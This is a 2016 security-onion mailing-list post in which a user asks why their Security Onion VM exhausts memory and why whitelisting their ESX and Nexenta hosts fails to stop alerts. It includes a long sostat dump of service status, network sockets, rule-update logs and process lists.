Resource depletion high uncategorized unable to whitelist ip successfully


Robbie Foster

Aug 14, 2016, 3:03:07 PM
to security-onion
Sorry about the title. No matter how many RAM resources I apply, the application seems to fill up and crash. I am new to this, so please bear with me. I have tried white_list.rules in /etc/nsm/rules. I am getting a huge number of events for my ESX and Nexenta file system that Security Onion lives on. I need to exempt these IPs from triggering alarms, but the whitelist doesn't work. I suspect there is another list somewhere that is re-flagging. I am currently at 4 CPUs and 10 GB RAM. I had 15 GB RAM, but it fills up as well. The documentation is more than a little difficult to find any solutions in.

I rolled back to a snapshot after soup ran and re-ran setup with 2 interfaces, which are on the same physical NIC in ESXi, one management and one sniff. I lowered the sniff MTU from 4500 to the default recommended. Security Onion seems like a great appliance, but it is a steep learning curve in my case.

The sostat below is current but doesn't reflect previous attempts. The all-time Sguil events are the IPs I need to ignore. System info: Xeon E5-2630 v4, 10 GB RAM currently and a 200 GB drive on VMware ESXi, with a Nexenta share back to ESX where the Security Onion VM lives.


=========================================================================
Service Status
=========================================================================
Status: securitySO-server
* SO-user server[ OK ]
Status: HIDS
* ossec_agent (SO-user)[ OK ]
Status: Bro
Getting process status ...
Getting peer status ...
Name Type Host Status Pid Peers Started
manager manager localhost running 108979 2 14 Aug 17:37:09
proxy proxy localhost running 109019 2 14 Aug 17:37:11
SO-server-eth1-1 worker localhost running 109060 2 14 Aug 17:37:14
Status: SO-server-eth1
* netsniff-ng (full packet data)[ OK ]
* pcap_agent (SO-user)[ OK ]
* snort_agent-1 (SO-user)[ OK ]
* snort-1 (alert data)[ OK ]
* barnyard2-1 (spooler, unified2 format)[ OK ]

=========================================================================
Interface Status
=========================================================================
eth0 Link encap:Ethernet HWaddr MM:MM:MM:MM:MM:MM
inet addr:X.X.X.X Bcast:X.X.X.X Mask:X.X.X.X
inet6 addr: X.X.X.X/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:33340 errors:0 dropped:0 overruns:0 frame:0
TX packets:19018 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:28314801 (28.3 MB) TX bytes:1886387 (1.8 MB)

eth1 Link encap:Ethernet HWaddr MM:MM:MM:MM:MM:MM
UP BROADCAST RUNNING NOARP PROMISC MULTICAST MTU:1550 Metric:1
RX packets:56106923 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:56503542122 (56.5 GB) TX bytes:0 (0.0 B)

lo Link encap:Local Loopback
inet addr:X.X.X.X Mask:X.X.X.X
inet6 addr: X.X.X.X/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:2744340 errors:0 dropped:0 overruns:0 frame:0
TX packets:2744340 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:4550474303 (4.5 GB) TX bytes:4550474303 (4.5 GB)


=========================================================================
Link Statistics
=========================================================================
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default
link/loopback MM:MM:MM:MM:MM:MM brd MM:MM:MM:MM:MM:MM
RX: bytes packets errors dropped overrun mcast
4550474303 2744340 0 0 0 0
RX errors: length crc frame fifo missed
0 0 0 0 0
TX: bytes packets errors dropped carrier collsns
4550474303 2744340 0 0 0 0
TX errors: aborted fifo window heartbeat
0 0 0 0
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP mode DEFAULT group default qlen 1000
link/ether MM:MM:MM:MM:MM:MM brd MM:MM:MM:MM:MM:MM
RX: bytes packets errors dropped overrun mcast
28314801 33340 0 0 0 538
RX errors: length crc frame fifo missed
0 0 0 0 0
TX: bytes packets errors dropped carrier collsns
1886387 19018 0 0 0 0
TX errors: aborted fifo window heartbeat
0 0 0 0
3: eth1: <BROADCAST,MULTICAST,NOARP,PROMISC,UP,LOWER_UP> mtu 1550 qdisc mq state UP mode DEFAULT group default qlen 1000
link/ether MM:MM:MM:MM:MM:MM brd MM:MM:MM:MM:MM:MM
RX: bytes packets errors dropped overrun mcast
56503734284 56107111 0 0 0 97545
RX errors: length crc frame fifo missed
0 0 0 0 0
TX: bytes packets errors dropped carrier collsns
0 0 0 0 0 0
TX errors: aborted fifo window heartbeat
0 0 0 0

=========================================================================
Disk Usage
=========================================================================
Filesystem Size Used Avail Use% Mounted on
udev 4.9G 4.0K 4.9G 1% /dev
tmpfs 999M 3.6M 995M 1% /run
/dev/dm-0 187G 50G 128G 29% /
none 4.0K 0 4.0K 0% /sys/fs/cgroup
none 5.0M 0 5.0M 0% /run/lock
none 4.9G 7.6M 4.9G 1% /run/shm
none 100M 28K 100M 1% /run/user
/dev/sda1 236M 48M 177M 22% /boot

=========================================================================
Network Sockets
=========================================================================
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
avahi-dae 1316 avahi 12u IPv4 15407 0t0 UDP *:5353
avahi-dae 1316 avahi 13u IPv6 15408 0t0 UDP *:5353
avahi-dae 1316 avahi 14u IPv4 15409 0t0 UDP *:34750
avahi-dae 1316 avahi 15u IPv6 15410 0t0 UDP *:42098
sshd 1473 root 3u IPv4 13086 0t0 TCP *:ssh_port (LISTEN)
sshd 1473 root 4u IPv6 13088 0t0 TCP *:ssh_port (LISTEN)
cups-brow 1581 root 6u IPv6 20242 0t0 TCP [X.X.X.X]:52879->[X.X.X.X]:631 (CLOSE_WAIT)
cups-brow 1581 root 8u IPv4 20244 0t0 UDP *:631
searchd 1598 sphinxsearch 7u IPv4 14711 0t0 TCP *:9306 (LISTEN)
searchd 1598 sphinxsearch 8u IPv4 14712 0t0 TCP *:9312 (LISTEN)
syslog-ng 1600 root 9u IPv4 14713 0t0 TCP *:514 (LISTEN)
syslog-ng 1600 root 10u IPv4 14714 0t0 UDP *:514
mysqld 1606 mysql 10u IPv4 17992 0t0 TCP X.X.X.X:3306 (LISTEN)
salt-mini 1665 root 13u IPv4 18807 0t0 TCP X.X.X.X:54576->X.X.X.X:4506 (ESTABLISHED)
salt-mini 1665 root 24u IPv4 18842 0t0 TCP X.X.X.X:39672->X.X.X.X:4505 (ESTABLISHED)
ossec-csy 1683 ossecm 5u IPv4 16838 0t0 UDP X.X.X.X:49198->X.X.X.X:514
salt-mast 1787 root 12u IPv4 14887 0t0 TCP *:4505 (LISTEN)
salt-mast 1787 root 14u IPv4 19513 0t0 TCP X.X.X.X:4505->X.X.X.X:39672 (ESTABLISHED)
salt-mast 1801 root 20u IPv4 14893 0t0 TCP *:4506 (LISTEN)
salt-mast 1801 root 22u IPv4 18808 0t0 TCP X.X.X.X:4506->X.X.X.X:54576 (ESTABLISHED)
cupsd 3292 root 10u IPv6 21099 0t0 TCP [X.X.X.X]:631 (LISTEN)
cupsd 3292 root 11u IPv4 21100 0t0 TCP X.X.X.X:631 (LISTEN)
ntpd 4733 ntp 16u IPv4 27047 0t0 UDP *:123
ntpd 4733 ntp 17u IPv6 27048 0t0 UDP *:123
ntpd 4733 ntp 18u IPv4 27054 0t0 UDP X.X.X.X:123
ntpd 4733 ntp 19u IPv4 27055 0t0 UDP X.X.X.X:123
ntpd 4733 ntp 20u IPv6 27056 0t0 UDP [X.X.X.X]:123
ntpd 4733 ntp 21u IPv6 27057 0t0 UDP [X.X.X.X]:123
/usr/sbin 4821 root 5u IPv6 27124 0t0 TCP *:443 (LISTEN)
/usr/sbin 4821 root 7u IPv6 27128 0t0 TCP *:9876 (LISTEN)
/usr/sbin 4821 root 9u IPv6 27134 0t0 TCP *:3154 (LISTEN)
tclsh 16489 SO-user 13u IPv4 220962 0t0 TCP *:7734 (LISTEN)
tclsh 16489 SO-user 14u IPv6 220963 0t0 TCP *:7734 (LISTEN)
tclsh 16489 SO-user 15u IPv4 220966 0t0 TCP *:7736 (LISTEN)
tclsh 16489 SO-user 16u IPv6 220967 0t0 TCP *:7736 (LISTEN)
tclsh 16489 SO-user 17u IPv4 356927 0t0 TCP X.X.X.X:7736->X.X.X.X:48703 (ESTABLISHED)
tclsh 16489 SO-user 18u IPv4 356116 0t0 TCP X.X.X.X:7736->X.X.X.X:60252 (ESTABLISHED)
Error: database is locked: /nsm/bro/spool/state.db
tclsh 16489 SO-user 19u IPv4 356333 0t0 TCP X.X.X.X:7736->X.X.X.X:39679 (ESTABLISHED)
tclsh 16489 SO-user 20u IPv4 509520 0t0 TCP X.X.X.X:7734->X.X.X.X:37874 (ESTABLISHED)
tclsh 67434 SO-user 3u IPv4 358535 0t0 TCP X.X.X.X:48703->X.X.X.X:7736 (ESTABLISHED)
tclsh 67719 SO-user 3u IPv4 357056 0t0 TCP X.X.X.X:60252->X.X.X.X:7736 (ESTABLISHED)
tclsh 67964 SO-user 3u IPv4 357822 0t0 TCP X.X.X.X:39679->X.X.X.X:7736 (ESTABLISHED)
tclsh 67964 SO-user 4u IPv4 357823 0t0 TCP X.X.X.X:8101 (LISTEN)
tclsh 67964 SO-user 6u IPv4 466584 0t0 TCP X.X.X.X:8101->X.X.X.X:33916 (ESTABLISHED)
sshd 107314 root 3u IPv4 461280 0t0 TCP X.X.X.X:ssh_port->X.X.X.X:52220 (ESTABLISHED)
sshd 107385 SO-user 3u IPv4 461280 0t0 TCP X.X.X.X:ssh_port->X.X.X.X:52220 (ESTABLISHED)
bro 108979 SO-user 4u IPv4 466410 0t0 UDP X.X.X.X:43208->X.X.X.X:53
bro 108981 SO-user 0u IPv4 465485 0t0 TCP *:47761 (LISTEN)
bro 108981 SO-user 1u IPv6 465486 0t0 TCP *:47761 (LISTEN)
bro 108981 SO-user 2u IPv4 467205 0t0 TCP X.X.X.X:47761->X.X.X.X:39503 (ESTABLISHED)
bro 108981 SO-user 4u IPv4 466410 0t0 UDP X.X.X.X:43208->X.X.X.X:53
bro 108981 SO-user 268u IPv4 467225 0t0 TCP X.X.X.X:47761->X.X.X.X:39504 (ESTABLISHED)
bro 109019 SO-user 4u IPv4 466457 0t0 UDP X.X.X.X:49233->X.X.X.X:53
bro 109021 SO-user 0u IPv4 465491 0t0 TCP X.X.X.X:39503->X.X.X.X:47761 (ESTABLISHED)
bro 109021 SO-user 4u IPv4 466457 0t0 UDP X.X.X.X:49233->X.X.X.X:53
bro 109021 SO-user 266u IPv4 465496 0t0 TCP *:47762 (LISTEN)
bro 109021 SO-user 267u IPv6 465497 0t0 TCP *:47762 (LISTEN)
bro 109021 SO-user 268u IPv4 465558 0t0 TCP X.X.X.X:47762->X.X.X.X:37169 (ESTABLISHED)
bro 109060 SO-user 4u IPv4 466470 0t0 UDP X.X.X.X:44709->X.X.X.X:53
bro 109061 SO-user 0u IPv4 468147 0t0 TCP X.X.X.X:39504->X.X.X.X:47761 (ESTABLISHED)
bro 109061 SO-user 4u IPv4 466470 0t0 UDP X.X.X.X:44709->X.X.X.X:53
bro 109061 SO-user 266u IPv4 468150 0t0 TCP X.X.X.X:37169->X.X.X.X:47762 (ESTABLISHED)
bro 109061 SO-user 271u IPv4 468155 0t0 TCP *:47763 (LISTEN)
bro 109061 SO-user 272u IPv6 468156 0t0 TCP *:47763 (LISTEN)
barnyard2 109167 SO-user 3u IPv4 468204 0t0 TCP X.X.X.X:33916->X.X.X.X:8101 (ESTABLISHED)
chromium- 110134 SO-user 62u IPv4 478697 0t0 UDP *:5353
chromium- 110134 SO-user 116u IPv6 515554 0t0 TCP [X.X.X.X]:60048->[X.X.X.X]:443 (CLOSE_WAIT)
wish 116156 SO-user 4u IPv4 508860 0t0 TCP X.X.X.X:37874->X.X.X.X:7734 (ESTABLISHED)
/usr/sbin 118049 www-data 5u IPv6 27124 0t0 TCP *:443 (LISTEN)
/usr/sbin 118049 www-data 7u IPv6 27128 0t0 TCP *:9876 (LISTEN)
/usr/sbin 118049 www-data 9u IPv6 27134 0t0 TCP *:3154 (LISTEN)
/usr/sbin 118050 www-data 5u IPv6 27124 0t0 TCP *:443 (LISTEN)
/usr/sbin 118050 www-data 7u IPv6 27128 0t0 TCP *:9876 (LISTEN)
/usr/sbin 118050 www-data 9u IPv6 27134 0t0 TCP *:3154 (LISTEN)
/usr/sbin 118051 www-data 5u IPv6 27124 0t0 TCP *:443 (LISTEN)
/usr/sbin 118051 www-data 7u IPv6 27128 0t0 TCP *:9876 (LISTEN)
/usr/sbin 118051 www-data 9u IPv6 27134 0t0 TCP *:3154 (LISTEN)
/usr/sbin 118071 www-data 5u IPv6 27124 0t0 TCP *:443 (LISTEN)
/usr/sbin 118071 www-data 7u IPv6 27128 0t0 TCP *:9876 (LISTEN)
/usr/sbin 118071 www-data 9u IPv6 27134 0t0 TCP *:3154 (LISTEN)
/usr/sbin 118072 www-data 5u IPv6 27124 0t0 TCP *:443 (LISTEN)
/usr/sbin 118072 www-data 7u IPv6 27128 0t0 TCP *:9876 (LISTEN)
/usr/sbin 118072 www-data 9u IPv6 27134 0t0 TCP *:3154 (LISTEN)
/usr/sbin 118073 www-data 5u IPv6 27124 0t0 TCP *:443 (LISTEN)
/usr/sbin 118073 www-data 7u IPv6 27128 0t0 TCP *:9876 (LISTEN)
/usr/sbin 118073 www-data 9u IPv6 27134 0t0 TCP *:3154 (LISTEN)

=========================================================================
IDS Rules Update
=========================================================================
Sun Aug 14 03:17:24 UTC 2016
Backing up current local_rules.xml file.
Cleaning up local_rules.xml backup files older than 30 days.
Backing up current downloaded.rules file before it gets overwritten.
Cleaning up downloaded.rules backup files older than 30 days.
Backing up current local.rules file before it gets overwritten.
Cleaning up local.rules backup files older than 30 days.
Running PulledPork.
http://code.google.com/p/pulledpork/
_____ ____
`----,\ )
`--==\\ / PulledPork v0.7.0 - Swine Flu!
`--==\\/
.-~~~~-.Y|\\_ Copyright (C) 2009-2013 JJ Cummings
@_/ / 66\_ cumm...@gmail.com
| \ \ _(")
\ /-| ||'--' Rules give me wings!
\_\ \_\\
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Checking latest MD5 for emerging.rules.tar.gz....
Rules tarball download of emerging.rules.tar.gz....
They Match
Done!
Prepping rules from emerging.rules.tar.gz for work....
Done!
Reading rules...
Generating Stub Rules....
Done
Reading rules...
Reading rules...
Modifying Sids....
Done!
Processing /etc/nsm/pulledpork/enablesid.conf....
Modified 0 rules
Done
Processing /etc/nsm/pulledpork/dropsid.conf....
Modified 0 rules
Done
Processing /etc/nsm/pulledpork/disablesid.conf....
Modified 0 rules
Done
Setting Flowbit State....
Enabled 88 flowbits
Done
Writing /etc/nsm/rules/downloaded.rules....
Done
Generating sid-msg.map....
Done
Writing v1 /etc/nsm/rules/sid-msg.map....
Done
Writing /var/log/nsm/sid_changes.log....
Done
Rule Stats...
New:-------3102
Deleted:---158
Enabled Rules:----19810
Dropped Rules:----0
Disabled Rules:---4254
Total Rules:------24064
No IP Blacklist Changes
Done
Please review /var/log/nsm/sid_changes.log for additional details
Fly Piggy Fly!
Sun Aug 14 07:01:01 UTC 2016
Backing up current local_rules.xml file.
Cleaning up local_rules.xml backup files older than 30 days.
Backing up current downloaded.rules file before it gets overwritten.
Cleaning up downloaded.rules backup files older than 30 days.
Backing up current local.rules file before it gets overwritten.
Cleaning up local.rules backup files older than 30 days.
Sleeping for 45 minutes to avoid overwhelming rule sites.
Running PulledPork.
http://code.google.com/p/pulledpork/
_____ ____
`----,\ )
`--==\\ / PulledPork v0.7.0 - Swine Flu!
`--==\\/
.-~~~~-.Y|\\_ Copyright (C) 2009-2013 JJ Cummings
@_/ / 66\_ cumm...@gmail.com
| \ \ _(")
\ /-| ||'--' Rules give me wings!
\_\ \_\\
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Checking latest MD5 for emerging.rules.tar.gz....
They Match
Done!
Prepping rules from emerging.rules.tar.gz for work....
Done!
Reading rules...
Generating Stub Rules....
Done
Reading rules...
Reading rules...
Modifying Sids....
Done!
Processing /etc/nsm/pulledpork/enablesid.conf....
Modified 0 rules
Done
Processing /etc/nsm/pulledpork/dropsid.conf....
Modified 0 rules
Done
Processing /etc/nsm/pulledpork/disablesid.conf....
Modified 0 rules
Done
Setting Flowbit State....
Enabled 88 flowbits
Done
Writing /etc/nsm/rules/downloaded.rules....
Done
Generating sid-msg.map....
Done
Writing v1 /etc/nsm/rules/sid-msg.map....
Done
Writing /var/log/nsm/sid_changes.log....
Done
Rule Stats...
New:-------0
Deleted:---0
Enabled Rules:----19810
Dropped Rules:----0
Disabled Rules:---4254
Total Rules:------24064
No IP Blacklist Changes
Done
Please review /var/log/nsm/sid_changes.log for additional details
Fly Piggy Fly!

=========================================================================
CPU Usage
=========================================================================
Load average for the last 1, 5, and 15 minutes:
10.88 9.87 9.87
Processing units: 4
If load average is higher than processing units,
then tune until load average is lower than processing units.

top - 18:40:16 up 14:49, 2 users, load average: 10.88, 9.87, 9.87
Tasks: 323 total, 6 running, 317 sleeping, 0 stopped, 0 zombie
%Cpu(s): 2.4 us, 0.6 sy, 0.0 ni, 91.6 id, 5.4 wa, 0.0 hi, 0.1 si, 0.0 st
KiB Mem: 10223820 total, 10090688 used, 133132 free, 28552 buffers
KiB Swap: 10485756 total, 81100 used, 10404656 free. 6745704 cached Mem

%CPU %MEM COMMAND
30.5 0.0 /opt/bro/bin/capstats -I 5 -n 1 -i eth1
16.1 4.0 snort -c /etc/nsm/SO-server-eth1/snort.conf -u SO-user -g SO-user -i eth1 -l /nsm/sensor_data/SO-server-eth1/snort-1 --perfmon-file /nsm/sensor_data/SO-server-eth1/snort-1.stats -U
11.0 1.1 /opt/bro/bin/bro -i eth1 -U .status -p broctl -p broctl-live -p local -p SO-server-eth1-1 local.bro broctl base/frameworks/cluster local-worker.bro broctl/auto
8.6 0.0 [kworker/0:2]
8.0 0.7 perl /opt/elsa/web/cron.pl -c /etc/elsa_web.conf
6.9 0.9 /usr/lib/chromium-browser/chro
6.1 0.1 barnyard2 -c /etc/nsm/SO-server-eth1/barnyard2-1.conf -u SO-user -g SO-user -d /nsm/sensor_data/SO-server-eth1/snort-1 -f snort.unified2 -w /etc/nsm/SO-server-eth1/barnyard2.waldo-1 -i 1 -U
5.1 2.7 netsniff-ng -i eth1 -o /nsm/sensor_data/SO-server-eth1/dailylogs/2016-08-14/ --user 1001 --group 1001 -s --prefix snort.log. --verbose --ring-size 256 iB --interval 150 iB
3.8 0.3 wish /usr/bin/SO-user.tk
3.0 0.9 chromium-browser --enable-pinch https://localhost/squert
2.9 0.0 [watchdog/0]
2.9 0.4 /opt/bro/bin/bro -U .status -p broctl -p broctl-live -p local -p manager local.bro broctl base/frameworks/cluster local-manager.bro broctl/auto
2.5 0.4 /opt/bro/bin/bro -U .status -p broctl -p broctl-live -p local -p proxy local.bro broctl base/frameworks/cluster local-proxy broctl/auto
2.5 0.0 [kworker/u256:5]
2.5 0.0 [kworker/u256:4]
2.3 0.0 [ksoftirqd/0]
1.9 0.0 [kworker/u256:3]
1.8 0.3 /usr/bin/X -core :0 -seat seat0 -auth /var/run/lightdm/root/:0 -nolisten tcp vt7 -novtswitch
1.6 0.0 [kworker/u256:2]
1.6 0.0 [kworker/1:5]
1.5 0.0 [kworker/u256:1]
1.4 1.0 /usr/sbin/mysqld
1.2 0.0 [kworker/3:1]
1.2 0.0 [kworker/2:0]
1.0 2.9 /usr/bin/searchd --nodetach
0.9 0.0 [migration/0]
0.8 0.1 /usr/bin/python /opt/bro/bin/broctl cron
0.7 0.0 [watchdog/1]
0.7 0.0 [watchdog/2]
0.7 0.0 [watchdog/3]
0.7 0.0 [kworker/2:4]
0.3 0.0 [ksoftirqd/2]
0.3 0.0 [migration/3]
0.3 0.0 [ksoftirqd/3]
0.3 0.0 /usr/lib/rtkit/rtkit-daemon
0.3 6.8 tclsh /usr/bin/SO-userd -c /etc/nsm/securitySO-server/SO-userd.conf -a /etc/nsm/securitySO-server/autocat.conf -g /etc/nsm/securitySO-server/SO-userd.queries -A /etc/nsm/securitySO-server/SO-userd.access -C /etc/nsm/securitySO-server/certs
0.3 0.0 tclsh /usr/bin/snort_agent.tcl -c /etc/nsm/SO-server-eth1/snort_agent-1.conf
0.3 0.0 [kworker/u256:0]
0.3 0.6 /usr/lib/chromium-browser/chro
0.2 0.0 [rcu_sched]
0.2 0.0 [migration/1]
0.2 0.0 [migration/2]
0.2 0.0 [jbd2/dm-0-8]
0.2 0.1 /usr/sbin/syslog-ng -p /var/run/syslog-ng.pid
0.2 0.3 /usr/bin/python /usr/bin/salt-master
0.2 0.0 /usr/bin/vmtoolsd
0.2 0.3 xfdesktop
0.2 0.1 /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-1.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libwhiskermenu.so 1 16777248 whiskermenu Whisker Menu Show a menu to easily access installed applications
0.1 0.0 [kswapd0]
0.1 0.0 /var/ossec/bin/ossec-syscheckd
0.1 0.4 perl /opt/elsa/node/elsa.pl -c /etc/elsa_node.conf
0.1 0.7 /opt/bro/bin/bro -i eth1 -U .status -p broctl -p broctl-live -p local -p SO-server-eth1-1 local.bro broctl base/frameworks/cluster local-worker.bro broctl/auto
0.1 0.0 /usr/lib/x86_64-linux-gnu/indicator-messages/indicator-messages-service
0.1 0.2 chromium-browser --enable-features=DocumentWriteEvaluator<DocumentWriteEvaluator,RenderingPipelineThrottling<RenderingPipelineThrottling,V8_Serialize_Age_Code<V8SerializeOptions,V8_Serialize_Eager<V8SerializeOptions,WebRTC-H264WithOpenH264FFmpeg<WebRTC-H264WithOpenH264FFmpeg,token-binding<TokenBinding,use-new-media-cache<use-new-media-cache --force-fieldtrials=AsyncDNS/AsyncDNSA/AutofillClassifier/Enabled/AutofillFieldMetadata/Enabled/AutofillProfileOrderByFrecency/EnabledLimitTo3/CaptivePortalInterstitial/Enabled/ChromeDashboard/Enabled/ChromotingQUIC/Enabled/DocumentWriteEvaluator/Enabled/EnableGoogleCachedCopyTextExperiment/Button/EnableSessionCrashedBubbleUI/Enabled/*ExtensionActionRedesign/Enabled/InstanceID/Enabled/LocalNTPSuggestionsService/Enabled/MaterialDesignDownloads/Enabled/OfferUploadCreditCards/Enabled/PageRevisitInstrumentation/Enabled/PasswordBranding/SmartLockBrandingSavePromptOnly/*QUIC/Enabled/RefreshTokenDeviceId/Enabled/RenderingPipelineThrottling/Enabled/ReportCertificateErrors/ShowAndPossiblySend/ResourcePriorities/AllExceptAsyncScripts_11011_1_1_10/SSLCommonNameMismatchHandling/Enabled/SafeBrowsingReportPhishingErrorLink/Enabled/SafeBrowsingUnverifiedDownloads/DisableByParameterMostSbTypes2/SafeBrowsingUpdateFrequency/UpdateTime15m/SchedulerExpensiveTaskBlocking/Enabled/SdchPersistence/Enabled/SimpleCacheTrial/ExperimentYes/StrictSecureCookies/Enabled/SyncHttpContentCompression/Enabled/TabSyncByRecency/Enabled/*TokenBinding/TokenBinding/V8SerializeOptions/SerializeEagerAndAgeCode/VarationsServiceControl/Interval_30min/WebFontsIntervention/Enabled/WebRTC-H264WithOpenH264FFmpeg/Enabled/WebRTC-LocalIPPermissionCheck/Enabled/WebRTC-PeerConnectionDTLS1.2/Enabled/use-new-media-cache/Enabled/ --type=gpu-process --channel=110134.0.1621162264 --window-depth=24 --supports-dual-gpus=false --gpu-driver-bug-workarounds=4,54 --gpu-vendor-id=0x15ad --gpu-device-id=0x0405 --gpu-driver-vendor --gpu-driver-version --v8-natives-passed-by-fd 
--v8-snapshot-passed-by-
0.0 0.0 /sbin/init
0.0 0.0 [kthreadd]
0.0 0.0 [kworker/0:0H]
0.0 0.0 [rcu_bh]
0.0 0.0 [rcuos/0]
0.0 0.0 [rcuob/0]
0.0 0.0 [ksoftirqd/1]
0.0 0.0 [kworker/1:0H]
0.0 0.0 [rcuos/1]
0.0 0.0 [rcuob/1]
0.0 0.0 [kworker/2:0H]
0.0 0.0 [rcuos/2]
0.0 0.0 [rcuob/2]
0.0 0.0 [kworker/3:0H]
0.0 0.0 [rcuos/3]
0.0 0.0 [rcuob/3]
0.0 0.0 [khelper]
0.0 0.0 [kdevtmpfs]
0.0 0.0 [netns]
0.0 0.0 [perf]
0.0 0.0 [khungtaskd]
0.0 0.0 [writeback]
0.0 0.0 [ksmd]
0.0 0.0 [khugepaged]
0.0 0.0 [crypto]
0.0 0.0 [kintegrityd]
0.0 0.0 [bioset]
0.0 0.0 [kblockd]
0.0 0.0 [ata_sff]
0.0 0.0 [md]
0.0 0.0 [devfreq_wq]
0.0 0.0 [fsnotify_mark]
0.0 0.0 [ecryptfs-kthrea]
0.0 0.0 [kthrotld]
0.0 0.0 [acpi_thermal_pm]
0.0 0.0 [scsi_eh_0]
0.0 0.0 [scsi_tmf_0]
0.0 0.0 [scsi_eh_1]
0.0 0.0 [scsi_tmf_1]
0.0 0.0 [ipv6_addrconf]
0.0 0.0 [deferwq]
0.0 0.0 [charger_manager]
0.0 0.0 [ttm_swap]
0.0 0.0 [kpsmoused]
0.0 0.0 [mpt_poll_0]
0.0 0.0 [scsi_eh_2]
0.0 0.0 [scsi_tmf_2]
0.0 0.0 [scsi_eh_3]
0.0 0.0 [mpt/0]
0.0 0.0 [scsi_tmf_3]
0.0 0.0 [scsi_eh_4]
0.0 0.0 [scsi_tmf_4]
0.0 0.0 [scsi_eh_5]
0.0 0.0 [scsi_tmf_5]
0.0 0.0 [scsi_eh_6]
0.0 0.0 [scsi_tmf_6]
0.0 0.0 [scsi_eh_7]
0.0 0.0 [scsi_tmf_7]
0.0 0.0 [scsi_eh_8]
0.0 0.0 [scsi_tmf_8]
0.0 0.0 [scsi_eh_9]
0.0 0.0 [scsi_tmf_9]
0.0 0.0 [scsi_eh_10]
0.0 0.0 [scsi_tmf_10]
0.0 0.0 [scsi_eh_11]
0.0 0.0 [scsi_tmf_11]
0.0 0.0 [scsi_eh_12]
0.0 0.0 [scsi_tmf_12]
0.0 0.0 [scsi_eh_13]
0.0 0.0 [scsi_tmf_13]
0.0 0.0 [scsi_eh_14]
0.0 0.0 [scsi_tmf_14]
0.0 0.0 [scsi_eh_15]
0.0 0.0 [scsi_tmf_15]
0.0 0.0 [scsi_eh_16]
0.0 0.0 [scsi_tmf_16]
0.0 0.0 [scsi_eh_17]
0.0 0.0 [scsi_tmf_17]
0.0 0.0 [scsi_eh_18]
0.0 0.0 [scsi_tmf_18]
0.0 0.0 [scsi_eh_19]
0.0 0.0 [scsi_tmf_19]
0.0 0.0 [scsi_eh_20]
0.0 0.0 [scsi_tmf_20]
0.0 0.0 [scsi_eh_21]
0.0 0.0 [scsi_tmf_21]
0.0 0.0 [scsi_eh_22]
0.0 0.0 [scsi_tmf_22]
0.0 0.0 [scsi_eh_23]
0.0 0.0 [scsi_tmf_23]
0.0 0.0 [scsi_eh_24]
0.0 0.0 [scsi_tmf_24]
0.0 0.0 [scsi_eh_25]
0.0 0.0 [scsi_tmf_25]
0.0 0.0 [scsi_eh_26]
0.0 0.0 [scsi_tmf_26]
0.0 0.0 [scsi_eh_27]
0.0 0.0 [scsi_tmf_27]
0.0 0.0 [scsi_eh_28]
0.0 0.0 [scsi_tmf_28]
0.0 0.0 [scsi_eh_29]
0.0 0.0 [scsi_tmf_29]
0.0 0.0 [scsi_eh_30]
0.0 0.0 [scsi_tmf_30]
0.0 0.0 [scsi_eh_31]
0.0 0.0 [scsi_tmf_31]
0.0 0.0 [scsi_eh_32]
0.0 0.0 [scsi_tmf_32]
0.0 0.0 [kworker/0:1H]
0.0 0.0 [kdmflush]
0.0 0.0 [bioset]
0.0 0.0 [kdmflush]
0.0 0.0 [bioset]
0.0 0.0 [bioset]
0.0 0.0 [ext4-rsv-conver]
0.0 0.0 upstart-udev-bridge --daemon
0.0 0.0 /lib/systemd/systemd-udevd --daemon
0.0 0.0 [kmpathd]
0.0 0.0 [kmpath_handlerd]
0.0 0.0 [kworker/3:1H]
0.0 0.0 upstart-socket-bridge --daemon
0.0 0.0 [ext4-rsv-conver]
0.0 0.0 dbus-daemon --system --fork
0.0 0.0 upstart-file-bridge --daemon
0.0 0.0 /lib/systemd/systemd-logind
0.0 0.0 /usr/sbin/bluetoothd
0.0 0.0 avahi-daemon: running [SO-server.local]
0.0 0.0 avahi-daemon: chroot helper
0.0 0.0 [krfcommd]
0.0 0.0 /sbin/getty -8 38400 tty4
0.0 0.0 /sbin/getty -8 38400 tty5
0.0 0.0 /usr/bin/python /usr/bin/salt-minion
0.0 0.0 /sbin/getty -8 38400 tty2
0.0 0.0 /sbin/getty -8 38400 tty3
0.0 0.1 /usr/bin/python /usr/bin/salt-master
0.0 0.0 /sbin/getty -8 38400 tty6
0.0 0.0 /usr/sbin/sshd -D
0.0 0.0 cron
0.0 0.0 su -s /bin/sh -c exec "$0" "$@" sphinxsearch -- /usr/bin/searchd --nodetach
0.0 0.0 [kauditd]
0.0 0.0 /usr/sbin/cups-browsed
0.0 0.0 supervising syslog-ng
0.0 0.0 acpid -c /etc/acpi/events -s /var/run/acpid.socket
0.0 0.0 /usr/sbin/kerneloops
0.0 0.2 /usr/bin/python /usr/bin/salt-minion
0.0 0.0 /var/ossec/bin/ossec-csyslogd
0.0 0.0 /var/ossec/bin/ossec-execd
0.0 0.0 /var/ossec/bin/ossec-analysisd
0.0 0.0 lightdm
0.0 0.0 /var/ossec/bin/ossec-logcollector
0.0 0.0 /usr/lib/accountsservice/accounts-daemon
0.0 0.0 /usr/lib/policykit-1/polkitd --no-debug
0.0 0.1 /usr/bin/python /usr/bin/salt-master
0.0 0.1 /usr/bin/python /usr/bin/salt-master
0.0 0.1 /usr/bin/python /usr/bin/salt-master
0.0 0.3 /usr/bin/python /usr/bin/salt-master
0.0 0.3 /usr/bin/python /usr/bin/salt-master
